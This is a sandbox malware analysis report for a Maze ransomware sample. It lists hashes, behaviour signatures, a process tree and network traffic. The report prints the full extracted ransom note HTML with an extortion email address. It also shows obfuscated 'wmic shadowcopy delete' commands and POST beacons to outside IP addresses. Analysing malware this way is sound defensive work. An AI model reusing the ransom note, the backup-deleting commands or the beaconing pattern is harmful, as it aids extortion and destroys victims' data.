Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

3

1.exe

windows7-x64

10

1.exe

windows10-2004-x64

10

Resubmissions

11/06/2024, 09:53 UTC

240611-lwmnaaseqh 10

11/06/2024, 09:47 UTC

240611-lsfesssdqh 10

Analysis

  • max time kernel
    954s
  • max time network
    962s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11/06/2024, 09:53 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    1.exe

  • Size

    447KB

  • MD5

    9823800f063a1d4ee7a749961db7540f

  • SHA1

    9d2917a668b30ba9f6b3e7a3316553791eb1c052

  • SHA256

    a9524de985a3ecc43e11dd7c051a4bbfe08c3d71cde98ea9bb6ea7f32c0cb174

  • SHA512

    c48624e32dba7f08ce0ca8267e541b123c6a9bf848b81d9e62f7fc4bec9b8ed801a6204ffaece4decf0d31bf2595867ff6f8c0b176e366848b61145cc585e41e

  • SSDEEP

    12288:Yn+KS3UINuBGCz0SxWUNmH2o8PXwU9Eq7zKloxTwRtjauqCXy3X:Y+FUKWAHNqXwUlzD9w7PqCin

Score
10/10
mazedefense_evasionexecutionimpactransomwarespywarestealertrojan

Malware Config

Extracted

Path

F:\DECRYPT-FILES.html

Ransom Note
<html> <head> <script> function CopyToClipboard(containerid) { if (document.selection) { var range = document.body.createTextRange(); range.moveToElementText(document.getElementById(containerid)); range.select().createTextRange(); document.execCommand("copy"); } else if (window.getSelection) { var range = document.createRange(); range.selectNode(document.getElementById(containerid)); window.getSelection().addRange(range); document.execCommand("copy"); alert("Base64 copied into the clipboard!") } } </script> <style> html{ margin:0; padding:0; width:100%; height:100%; } body { background: #000080; color: #ececec; font-family: Consolas }; .tooltip { position: relative; display: inline-block; border-bottom: 1px dotted black; } .tooltip .tooltiptext { visibility: hidden; width: 120px; background-color: #555; color: #fff; text-align: center; border-radius: 6px; padding: 5px 0; position: absolute; z-index: 1; bottom: 125%; left: 50%; margin-left: -60px; opacity: 0; transition: opacity 0.3s; } .tooltip .tooltiptext::after { content: ""; position: absolute; top: 100%; left: 50%; margin-left: -5px; border-width: 5px; border-style: solid; border-color: #555 transparent transparent transparent; } .tooltip:hover .tooltiptext { visibility: visible; opacity: 1; } p#base64{ -ms-word-break: break-all; word-break: break-all; -webkit-hyphens: auto; -moz-hyphens: auto; -ms-hyphens: auto; hyphens: auto; } p#base64:hover{ cursor: hand; } </style> </head> <body> <table style="position: absolute;" width="100%"> <tr> <td style="width: 25%;"> <span class="left" style="font-size: 14px; font-weight: bold">CODE: <br>------ <br>00000&nbsp;00000 <br>00000&nbsp;00000 <br>00000&nbsp;00000 <br>00000&nbsp;00000 <br>00000&nbsp;00000 <br>00000&nbsp;00000 <br>00000&nbsp;00000 <br>00000&nbsp;00000 </span> </td> <td style="width: 50%;"> <div style="text-align: center; font-size: 20px;"> <p><s>0010 SYSTEM FAILURE 0010</s></p> <p>*********************************************************************************************************************</p> <p>Attention! Your documents, photos, databases, and other important files have been encrypted!</p> <p>*********************************************************************************************************************</p> <br> </div> <div style="text-align: center; font-size: 18px;"> <p>The only way to decrypt your files, is to buy the private key from us.</p> <p>You can decrypt one of your files for free, as a proof that we have the method to decrypt the rest of your data.</p> <p>In order to receive the private key contact us via email: <br> <b>decryptmaze@airmail.cc</b> </p> <p>Remember to hurry up, as your email address may not be avaliable for very long.<br>Buying the key immediatly will guarantee that 100% of your files will be restored.</p> <p>Below you will see a big base64 blob, you will need to email us and copy this blob to us.<br>you can click on it, and it will be copied into the clipboard.</p> <p>If you have troubles copying it, just send us the file you are currently reading, as an attachment.</p> <br> <p>Base64: </p> </div><div style="text-align: center; font-size: 12px;"><p id="base64" onclick="return CopyToClipboard('base64')" class="tooltip">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<span class="tooltiptext">Click here to copy</span></p></div></td><td style="width: 25%; text-align: right;"><span class="right" style="font-size: 14px; font-weight: bold">IMMINENT SHUTDOWN:<br>------<br>00000&nbsp;00000&nbsp;0&nbsp;00<br>00000&nbsp;00000&nbsp;0&nbsp;00<br>00000&nbsp;00000&nbsp;0&nbsp;00<br>00000&nbsp;00000&nbsp;0&nbsp;00<br>00000&nbsp;00000&nbsp;0&nbsp;00<br>00000&nbsp;00000&nbsp;0&nbsp;00<br>00000&nbsp;00000&nbsp;0&nbsp;00<br>00000&nbsp;00000&nbsp;0&nbsp;00</span></td></tr></table></body></html>
Emails

<b>decryptmaze@airmail.cc</b>

Signatures

  • Maze

    Ransomware family also known as ChaCha.

    trojanransomwaremaze
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomwaredefense_evasionimpactexecution
  • Drops startup file 4 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Program crash 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Users\Admin\AppData\Local\Temp\1.exe
    "C:\Users\Admin\AppData\Local\Temp\1.exe"
    1⤵
    • Drops startup file
    • Sets desktop wallpaper using registry
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:392
    • C:\Windows\system32\wbem\wmic.exe
      "C:\ris\..\Windows\c\bbe\c\..\..\..\system32\i\..\wbem\by\gv\iy\..\..\..\wmic.exe" shadowcopy delete
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:3212
    • C:\Windows\system32\wbem\wmic.exe
      "C:\pjoig\bjf\ndrvr\..\..\..\Windows\v\..\system32\txh\..\wbem\vu\cjonf\ihdqv\..\..\..\wmic.exe" shadowcopy delete
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1384
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 392 -s 2396
      2⤵
      • Program crash
      PID:700
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:4712
  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1340 --field-trial-handle=2236,i,5367110156796017614,12594004256180761011,262144 --variations-seed-version /prefetch:8
    1⤵
      PID:4472
    • C:\Windows\system32\AUDIODG.EXE
      C:\Windows\system32\AUDIODG.EXE 0x470 0x4f8
      1⤵
        PID:60
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 392 -ip 392
        1⤵
          PID:2272
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4152 --field-trial-handle=2236,i,5367110156796017614,12594004256180761011,262144 --variations-seed-version /prefetch:8
          1⤵
            PID:3436

          Network

          • flag-us
            DNS
            183.142.211.20.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            183.142.211.20.in-addr.arpa
            IN PTR
            Response
          • flag-us
            DNS
            81.144.22.2.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            81.144.22.2.in-addr.arpa
            IN PTR
            Response
            81.144.22.2.in-addr.arpa
            IN PTR
            a2-22-144-81deploystaticakamaitechnologiescom
          • flag-us
            DNS
            22.160.190.20.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            22.160.190.20.in-addr.arpa
            IN PTR
            Response
          • flag-us
            DNS
            95.221.229.192.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            95.221.229.192.in-addr.arpa
            IN PTR
            Response
          • flag-us
            DNS
            217.106.137.52.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            217.106.137.52.in-addr.arpa
            IN PTR
            Response
          • flag-us
            DNS
            241.150.49.20.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            241.150.49.20.in-addr.arpa
            IN PTR
            Response
          • flag-us
            DNS
            171.39.242.20.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            171.39.242.20.in-addr.arpa
            IN PTR
            Response
          • flag-us
            DNS
            157.123.68.40.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            157.123.68.40.in-addr.arpa
            IN PTR
            Response
          • flag-us
            DNS
            73.144.22.2.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            73.144.22.2.in-addr.arpa
            IN PTR
            Response
            73.144.22.2.in-addr.arpa
            IN PTR
            a2-22-144-73deploystaticakamaitechnologiescom
          • flag-ru
            POST
            http://92.63.194.20/create/suhrhoclq.shtml?ps=pgvasc&air=w0wlqu&eeh=r1l0eap70&nyf=7
            1.exe
            Remote address:
            92.63.194.20:80
            Request
            POST /create/suhrhoclq.shtml?ps=pgvasc&air=w0wlqu&eeh=r1l0eap70&nyf=7 HTTP/1.1
            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko
            Host: 92.63.194.20
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 259
            Connection: Keep-Alive
          • flag-ru
            POST
            http://92.63.194.20/create/suhrhoclq.shtml?ps=pgvasc&air=w0wlqu&eeh=r1l0eap70&nyf=7
            1.exe
            Remote address:
            92.63.194.20:80
            Request
            POST /create/suhrhoclq.shtml?ps=pgvasc&air=w0wlqu&eeh=r1l0eap70&nyf=7 HTTP/1.1
            Content-Type: application/x-www-form-urlencoded
            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko
            Host: 92.63.194.20
            Content-Length: 259
            Cache-Control: no-cache
            Response
            HTTP/1.1 500 Internal Server Error
            Server: nginx
            Date: Tue, 11 Jun 2024 09:55:10 GMT
            Content-Type: text/html; charset=iso-8859-1
            Content-Length: 594
            Connection: keep-alive
          • flag-us
            DNS
            20.194.63.92.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            20.194.63.92.in-addr.arpa
            IN PTR
            Response
            20.194.63.92.in-addr.arpa
            IN PTR
            vlan442dci
          • flag-us
            DNS
            23.173.189.20.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            23.173.189.20.in-addr.arpa
            IN PTR
            Response
          • flag-us
            DNS
            chromewebstore.googleapis.com
            Remote address:
            8.8.8.8:53
            Request
            chromewebstore.googleapis.com
            IN A
            Response
            chromewebstore.googleapis.com
            IN A
            172.217.16.234
            chromewebstore.googleapis.com
            IN A
            142.250.200.10
            chromewebstore.googleapis.com
            IN A
            142.250.200.42
            chromewebstore.googleapis.com
            IN A
            216.58.201.106
            chromewebstore.googleapis.com
            IN A
            216.58.204.74
            chromewebstore.googleapis.com
            IN A
            216.58.212.202
            chromewebstore.googleapis.com
            IN A
            216.58.212.234
            chromewebstore.googleapis.com
            IN A
            142.250.179.234
            chromewebstore.googleapis.com
            IN A
            142.250.180.10
            chromewebstore.googleapis.com
            IN A
            142.250.187.202
            chromewebstore.googleapis.com
            IN A
            142.250.187.234
            chromewebstore.googleapis.com
            IN A
            142.250.178.10
          • flag-us
            DNS
            chromewebstore.googleapis.com
            Remote address:
            8.8.8.8:53
            Request
            chromewebstore.googleapis.com
            IN Unknown
            Response
          • flag-us
            DNS
            234.16.217.172.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            234.16.217.172.in-addr.arpa
            IN PTR
            Response
            234.16.217.172.in-addr.arpa
            IN PTR
            lhr48s28-in-f101e100net
            234.16.217.172.in-addr.arpa
            IN PTR
            mad08s04-in-f10�I
          • 20.231.121.79:80
            46 B
             1
          • 92.63.8.47:80
            1.exe
            260 B
             5
          • 13.107.246.64:443
            46 B
             40 B
             1
            1
          • 92.63.8.47:80
            1.exe
            260 B
             5
          • 92.63.32.2:80
            1.exe
            260 B
             200 B
             5
            5
          • 92.63.32.2:80
            1.exe
            260 B
             200 B
             5
            5
          • 92.63.37.100:80
            1.exe
            260 B
             5
          • 92.63.37.100:80
            1.exe
            260 B
             5
          • 92.63.194.20:80
            http://92.63.194.20/create/suhrhoclq.shtml?ps=pgvasc&air=w0wlqu&eeh=r1l0eap70&nyf=7
            http
            1.exe
            771 B
             132 B
             5
            3

            HTTP Request

            POST http://92.63.194.20/create/suhrhoclq.shtml?ps=pgvasc&air=w0wlqu&eeh=r1l0eap70&nyf=7
          • 92.63.194.20:80
            http://92.63.194.20/create/suhrhoclq.shtml?ps=pgvasc&air=w0wlqu&eeh=r1l0eap70&nyf=7
            http
            1.exe
            772 B
             906 B
             5
            3

            HTTP Request

            POST http://92.63.194.20/create/suhrhoclq.shtml?ps=pgvasc&air=w0wlqu&eeh=r1l0eap70&nyf=7

            HTTP Response

            500
          • 92.63.17.245:80
            1.exe
            260 B
             5
          • 92.63.8.47:80
            1.exe
            260 B
             5
          • 92.63.17.245:80
            1.exe
            260 B
             5
          • 92.63.8.47:80
            1.exe
            260 B
             5
          • 92.63.32.55:80
            1.exe
            260 B
             5
          • 92.63.32.2:80
            1.exe
            52 B
             40 B
             1
            1
          • 172.217.16.234:443
            chromewebstore.googleapis.com
            tls
            2.2kB
             8.3kB
             22
            23
          • 8.8.8.8:53
            183.142.211.20.in-addr.arpa
            dns
            73 B
             159 B
             1
            1

            DNS Request

            183.142.211.20.in-addr.arpa

          • 8.8.8.8:53
            81.144.22.2.in-addr.arpa
            dns
            70 B
             133 B
             1
            1

            DNS Request

            81.144.22.2.in-addr.arpa

          • 8.8.8.8:53
            22.160.190.20.in-addr.arpa
            dns
            72 B
             158 B
             1
            1

            DNS Request

            22.160.190.20.in-addr.arpa

          • 8.8.8.8:53
            95.221.229.192.in-addr.arpa
            dns
            73 B
             144 B
             1
            1

            DNS Request

            95.221.229.192.in-addr.arpa

          • 8.8.8.8:53
            217.106.137.52.in-addr.arpa
            dns
            73 B
             147 B
             1
            1

            DNS Request

            217.106.137.52.in-addr.arpa

          • 8.8.8.8:53
            241.150.49.20.in-addr.arpa
            dns
            72 B
             158 B
             1
            1

            DNS Request

            241.150.49.20.in-addr.arpa

          • 8.8.8.8:53
            tls
            72 B
             158 B
             1
            1
          • 8.8.8.8:53
            171.39.242.20.in-addr.arpa
            dns
            72 B
             158 B
             1
            1

            DNS Request

            171.39.242.20.in-addr.arpa

          • 8.8.8.8:53
            157.123.68.40.in-addr.arpa
            dns
            72 B
             146 B
             1
            1

            DNS Request

            157.123.68.40.in-addr.arpa

          • 8.8.8.8:53
            73.144.22.2.in-addr.arpa
            dns
            70 B
             133 B
             1
            1

            DNS Request

            73.144.22.2.in-addr.arpa

          • 8.8.8.8:53
            20.194.63.92.in-addr.arpa
            dns
            71 B
             96 B
             1
            1

            DNS Request

            20.194.63.92.in-addr.arpa

          • 8.8.8.8:53
            23.173.189.20.in-addr.arpa
            dns
            72 B
             158 B
             1
            1

            DNS Request

            23.173.189.20.in-addr.arpa

          • 8.8.8.8:53
            chromewebstore.googleapis.com
            dns
            75 B
             267 B
             1
            1

            DNS Request

            chromewebstore.googleapis.com

            DNS Response

            172.217.16.234
            142.250.200.10
            142.250.200.42
            216.58.201.106
            216.58.204.74
            216.58.212.202
            216.58.212.234
            142.250.179.234
            142.250.180.10
            142.250.187.202
            142.250.187.234
            142.250.178.10

          • 8.8.8.8:53
            chromewebstore.googleapis.com
            dns
            75 B
             132 B
             1
            1

            DNS Request

            chromewebstore.googleapis.com

          • 8.8.8.8:53
            234.16.217.172.in-addr.arpa
            dns
            73 B
             142 B
             1
            1

            DNS Request

            234.16.217.172.in-addr.arpa

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • F:\DECRYPT-FILES.html
            Filesize

            6KB

            MD5

            348ccf8f265db9d6588c37f06f89a5dc

            SHA1

            8518e635cc4aaaeec1db342c29be880cd19154e5

            SHA256

            11a769eb18e3bc89df0778031f47c8b6efa0aa656d2d3a36d4f519afc408f3e8

            SHA512

            eb10ee4e9efa6ef36db3f293ac336b4b22f9d6a786ff0ed310b10a930b3f672834731290f542373d12272e6dcd8b3c3f5a47892d8a0b1e2c4f09180c179fe433

            Download Submit

          • memory/392-0-0x0000000000D30000-0x0000000000D89000-memory.dmp

            Filesize

            356KB

            Download

          • memory/392-1-0x0000000001110000-0x000000000116A000-memory.dmp

            Filesize

            360KB

            Download

          • memory/392-5-0x0000000001110000-0x000000000116A000-memory.dmp

            Filesize

            360KB

            Download

          • memory/392-9-0x0000000001110000-0x000000000116A000-memory.dmp

            Filesize

            360KB

            Download

          • memory/392-13-0x0000000001110000-0x000000000116A000-memory.dmp

            Filesize

            360KB

            Download

          • memory/392-5218-0x0000000001110000-0x000000000116A000-memory.dmp

            Filesize

            360KB

            Download

          We care about your privacy.

          This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.